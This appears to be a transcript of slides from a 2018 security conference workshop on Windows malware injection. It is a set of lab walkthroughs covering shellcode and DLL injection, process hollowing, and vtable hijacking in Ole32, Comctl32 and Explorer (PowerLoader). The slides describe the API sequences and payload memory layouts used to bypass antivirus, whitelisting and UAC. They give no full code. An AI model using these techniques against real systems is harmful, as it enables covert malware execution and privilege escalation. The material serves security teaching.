TDOHConf Workshop 2018: Playing Malware Injection with Exploit thoughts

Transcript

1. Workshop ⚐
   Playing Malware Injection
   with Exploit thoughts
   TDOHConf 2018, [email protected]
   !1
   

   View Slide

2. • Master degree at CSIE, NTUST
   • Security Researcher - chrO.ot, TDOHacker
   • Speaker
   - BlackHat, DEFCON, beVX, VXCON, HITCON
   >_cat ./Bio
   !2
   

   View Slide

3. • Recap
   • Malware Injection
   • Lab #1 - Basic Injection
   • Abuse the demon of Windows
   • Lab #2 - Ole32 DropEnter Event
   • Lab #3 - Comctl32 SubClass Event
   • Lab #4 - Extra Window Vulnerability aka PowerLoader
   >_cat ./lab
   !3
   

   View Slide

4. • Windows 7 x86
   • IDA (Demo Version)
   • Visual Stduio CMT
   • Chrome
   • x64dbg
   • Lab File x4
   >_ls ./env
   !4
   

   View Slide

5. [email protected]
   Recap: Ma1w4re !nj3cti0n
   !5
   

   View Slide

6. Process
   malware
   .text Section
   KiFastSystemCall
   _asm { sysenter }
   eax = function index
   ntdll.dll
   .text Section
   >_Win32 API
   !6
   KiFastSystemCall
   _asm { sysenter }
   Windows Kernel
   (Ring0)
   eax = function index
   kernel32.dll
   .text Section
   

   View Slide

7. >_Blindspot
   !7
   Process
   Malware Code
   Messenger
   .text Section
   RegOpenKey
   WriteProcessMemory
   ntdll.dll
   .text Section
   Windows Kernel
   (Ring0)
   DeleteFileA
   

   View Slide

8. >_man inject
   (｀_´)ゞ Used for bypassing whitelist checking, byassing
   anti-virus, privilege escalation, etc.
   e.g.
   • DLL Side-Loading + Digital Signature = Bypassing anti-virus
   • Remote Inject + whitelisted process = Bypassing whitelist
   • Inject explorer + DLL Side-Loading + Self-elevate Service

   = Bypassing Windows UAC (User Account Control) *Vista ~ Win8*
   !8
   

   View Slide

9. >_man inject
   There're serval well-known techniques
   • Shellcode Inject or DLL Inject - OpenProcess, VirtualAllocExRWX,
   WriteProcessMemory, CreateRemoteThread

   • Process Hollowing (aka RunPE) - OpenProcess, CreateProcessASuspended,
   Mapping PE FileVirtualAllocEx + WriteProcessMemory, GetThreadContext, and
   ResumeThread to Execute exe file from memory

   • Thread Hijack or AtomBombing - QueueUserAPC, Inline Hook, or IAT
   Hijack

   • Memory Exploit (PowerLoaderEX) - SetWindowLong, SendNotifyMessage
   !9
   

   View Slide

10. There are 4 primary challenges in injection:
    1. What's target - choose a target to inject, and it should be
    meaningful. e.g. explorer, svchost

    2. Where to place - find memory for us to place RWX memory or
    ROPChain payload. e.g. VirtualAllocEx

    3. How to inject payload - any way for us to write payload into
    remote process memory

    4. How to run it - create a new thread to execute or hijack
    current thread of that process?
    >_man inject
    !10
    

    View Slide

11. [email protected]
    !nJ3ct!0n Lab:
    From zero to Exploit.
    !11
    

    View Slide

12. [email protected]
    Lab #1
    Shellcode Injection
    !12
    

    View Slide

13. Process
    >_Process
    #0 Main Thread
    application
    .text Section
    ntdll.dll
    .text Section
    .data Section
    .bss Section
    Stack Memory
    Stack Register
    #1 Thread
    Stack Register
    #2 Thread
    Stack Register
    program counter (eip)
    

    View Slide

14. Process
    >_Process
    #0 Main Thread
    application
    .text Section
    ntdll.dll
    .text Section
    .data Section
    .bss Section
    Stack Memory
    Stack Register
    #1 Thread
    Stack Register
    #2 Thread
    Stack Register
    

    View Slide

15. EIP(x86), RIP(x86_64), program counter, or the
    instruction pointer, is a special-purpose register which
    stores a pointer to the address of the instruction that
    is currently executing. Making a jump is like adding to
    or subtracting from the instruction pointer.
    >_Intel x86 EIP
    wiki.skullsecurity.org/index.php?title=Registers#eip
    

    View Slide

16. Creates a thread that
    runs in the virtual
    address space of another
    process and optionally
    specifies extended
    attributes such as
    processor group affinity.
    >_CreateRemoteThreadEx
    Çdocs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex
    

    View Slide

17. [email protected]
    Demo
    !17
    

    View Slide

18. !18
    >_Remote Access Token?
    

    View Slide

19. User Interface Privilege Isolation (UIPI) is a technology
    introduced in Windows Vista and Windows Server 2008 to
    combat shatter attack exploits.
    By making use of Mandatory Integrity Control, it prevents
    processes with a lower "integrity level" (IL) from
    sending messages to higher IL processes (except for a
    very specific set of UI messages).
    >_It doesn't work?
    !19
    

    View Slide

20. Window messages are designed to communicate user action
    to processes.
    However, they can be used to run arbitrary code in the
    receiving process' context. This can be used by a
    malicious low IL process to run arbitrary code in the
    context of a higher IL process, which constitutes an
    unauthorized privilege escalation.
    By restricting access to some vectors for code execution
    and data injection, UIPI can mitigate these kinds of
    attacks.
    >_It doesn't work?
    !20
    

    View Slide

21. [email protected]
    Lab #1.1
    DLL Injection
    !21
    

    View Slide

22. >_Memory
    !22
    Ntdll.dll
    ...
    Process
    Kerne32.dll
    User32.dll
    ...
    Ntdll.dll
    ...
    Process
    Kerne32.dll
    User32.dll
    ...
    Messenger.exe
    Ntdll.dll
    ...
    Process
    Kerne32.dll
    User32.dll
    ...
    Chrome.exe
    Stack Memory Stack Memory Stack Memory
    Fixed ASLR
    Malware.exe
    Actually, system modules
    are located at the same
    memory space even different
    processes, even if ASLR
    protection is enabled by
    default after Windows 7.
    It means every system API
    function is placed at a
    predictable address.
    Low
    Heigh
    

    View Slide

23. Loads the specified
    module into the address
    space of the calling
    process. The specified
    module may cause other
    modules to be loaded.
    >_LoadLibraryA
    msdn.microsoft.com/zh-tw/library/windows/desktop/ms684175(v=vs.85).aspx
    

    View Slide

24. Creates a thread that
    runs in the virtual
    address space of another
    process and optionally
    specifies extended
    attributes such as
    processor group affinity.
    >_CreateRemoteThreadEx
    docs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex
    

    View Slide

25. A pointer to a variable
    to be passed to the
    thread function pointed
    to by lpStartAddress.
    This parameter can be
    NULL.
    >_lpParamter
    docs.microsoft.com/zh-tw/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createremotethreadex
    

    View Slide

26. LoadLibraryA (
    "\\127.0.0.1\C$\hackMudle.dll"
    );
    >_Goal⚐
    !26
    

    View Slide

27. >_Dll Injection
    github.com/aaaddress1/Dll-Injector-In-CB/blob/master/Unit1.cpp
    

    View Slide

28. [email protected]
    Lab #2
    Ole32 DropEnter Event
    !28
    

    View Slide

29. Open [email protected]$
    \Windows\System32\Ole32.dll
    file with IDA, and analyze the
    function PrivDragDrop.
    >_IDA
    !29
    

    View Slide

30. >_Rebase
    !30
    Due to ASLR protection,
    it's necessary for us to
    rebase the base of Ole32.dll
    for IDA to detect.
    We can use CheatEngine, PCHunter, Scrylla, etc. to fetch
    the base address of explorer.
    

    View Slide

31. We can debug a function inside the DLL in an active
    process dynamically now, after rebasing. ;)
    >_Debug Active DLL
    !31
    

    View Slide

32. >_cat ./ole32_init
    !32
    

    View Slide

33. >_cat ./reg_dropevent
    !33
    

    View Slide

34. >_man LPDROPTARGET
    IDropTarget actually is a virtual method table :)
    !34
    

    View Slide

35. >_issue?
    vtable addr is determined by GetProp()
    so... it's really easy for us to
    hijack vtable just by SetProp()
    This callback function is used to deal
    with dropping file to Start Button of
    Explorer.exe
    !35
    

    View Slide

36. explorer Process Memory
    DropTarget @ 0xc0fee
    Prop Name Value
    OleDropTargetInterface 0xbeef
    payload @ 0xbeef
    +0 - 0xbeef (this)
    +4 - don't care
    ...
    +8 - don't care
    +0C- shellcode addr
    it's easy for us to change the return value of
    GetPropW("OleDropTargetInterface") from 0xc0fee
    to 0xbeef (malicious payload).
    >_issue
    !36
    

    View Slide

37. explorer Process Memory
    Operating System
    1) Send Window Message (Drag & Drop)
    2)
    GetPropW("OleDropTargetInterface")
    3) Invoke drop file function from vtable,
    invoke shellcode addr = *(beef+0c)
    DropTarget @ 0xc0fee
    payload @ 0xbeef
    +0 - 0xbeef (this)
    +4 - don't care
    ...
    +8 - don't care
    +0C- shellcode addr
    Prop Name Value
    OleDropTargetInterface 0xbeef
    >_issue
    !37
    

    View Slide

38. >_abuse vtable
    !38
    

    View Slide

39. [email protected]
    Demo
    !39
    

    View Slide

40. [email protected]
    Lab #3
    Comctl32 SubClass Event
    !40
    

    View Slide

41. Open [email protected]$
    \Windows\System32\Comctl32.dll
    file with IDA, and analyze the
    function MasterSubclassProc.
    >_IDA
    !41
    

    View Slide

42. However Micro$oft have given
    comctl32.dll a patch at C$
    \Windows\WinSxS\x86_microsoft.wi
    ndows.common-
    controls_6595b64144ccf1df_6.0.76
    01.18837_none_41e855142bd5705d.
    We need to analyze this patch to
    understand how it works in real
    world.
    >_IDA
    !42
    

    View Slide

43. >_Rebase
    !43
    Due to ASLR protection,
    it's necessary for us to
    rebase the base of Comctl32
    for IDA to detect.
    We can use CheatEngine, PCHunter, Scrylla, etc. to fetch
    the base address of explorer.
    

    View Slide

44. We can debug a function inside the DLL in an active
    process dynamically now, after rebasing. ;)
    >_Debug Active DLL
    !44
    

    View Slide

45. >_cat FastGetSubclsHdr
    !45
    

    View Slide

46. >_cat MstSubclsProc
    !46
    

    View Slide

47. >_cat EnterSubclsFram
    !47
    

    View Slide

48. >_cat EntrSubclsCallbk
    !48
    

    View Slide

49. >_cat CallNxtSubclsProc
    !49
    

    View Slide

50. >_abuse vtable
    !50
    

    View Slide

51. >_abuse vtable
    !51
    

    View Slide

52. [email protected]
    Demo
    !52
    

    View Slide

53. [email protected]
    Lab #4
    Extra Window Vulnerability
    !53
    

    View Slide

54. Open [email protected]$\Windows\Explorer
    file with IDA, and analyze the
    function s_WndProc.
    >_IDA
    !54
    

    View Slide

55. >_CImpWndProc::s_WndProc
    !55
    

    View Slide

56. >_Rebase
    !56
    Due to ASLR protection,
    it's necessary for us to
    rebase the base of explorer
    for IDA to debug dynamically.
    We can use CheatEngine, PCHunter, Scrylla, etc. to fetch
    the base address of explorer.
    

    View Slide

57. >_Shell_TrayWnd?
    !57
    

    View Slide

58. >_Shell_TrayWnd?
    !58
    Window event callback function
    

    View Slide

59. [email protected]
    >_s_WndProc?
    !59
    

    View Slide

60. [email protected]
    >_s_WndProc?
    !60
    

    View Slide

61. Explorer Process Memory
    Shell_TrayWnd
    +0 - 0xcafe (vtable)
    +4 - window hwnd
    ...
    vtable @ 0xcafe
    +0 - Interlocked (inc)
    +4 - message callback
    +8 - Interlocked (inc)
    Operating System
    1) Send Window Message
    2) Send Window Message
    3) Invoke s_wndProc function
    4) Invoke several
    function from vtable
    >_how it works
    !61
    

    View Slide

62. Explorer Process Memory
    Shell_TrayWnd
    +0 - 0xcafe (vtable)
    +4 - window hwnd
    ...
    vtable @ 0xcafe
    +0 - Interlocked (inc)
    +4 - message callback
    +8 - Interlocked (inc)
    >_issue?
    GetWindowLong()
    !62
    

    View Slide

63. Explorer Process Memory
    Shell_TrayWnd
    +0 - 0xbeef 0xcafe
    +4 - window hwnd
    ...
    >_issue?
    GetWindowLong()
    vtable @ 0xcafe
    +0 - Interlocked (inc)
    +4 - message callback
    +8 - Interlocked (inc)
    fake vtable @ 0xbeef
    +0 - shellcode addr
    +4 - shellcode
    ...
    SetWindowLong()
    !63
    

    View Slide

64. Explorer Process Memory
    malicious
    Shell_TrayWnd
    >_issue?
    GetWindowLong()
    payload
    SetWindowLong()
    +0 - fake vtable ($+4)
    fake vtable
    +4 - shellcode addr ($+8)
    +8 - shellcode
    pwn!
    !64
    

    View Slide

65. >_abuse vtable
    !65
    

    View Slide

66. [email protected]
    Demo
    !66
    

    View Slide

67. >_Not Enough?
    • PowerLoader Injection – Something truly amazing
    • A basic trick. talk more on 64bit Attack
    • BreakingMalware/PowerLoaderEx (Github)
    • Pass the payload by Windows Extra Memory to explorer
    • Execute payload on RW memory with ROP-Chain
    !67
    

    View Slide

68. Thanks.
    [email protected]
    Slide
    Github @aaaddress1
    Facebook
    !68
    

    View Slide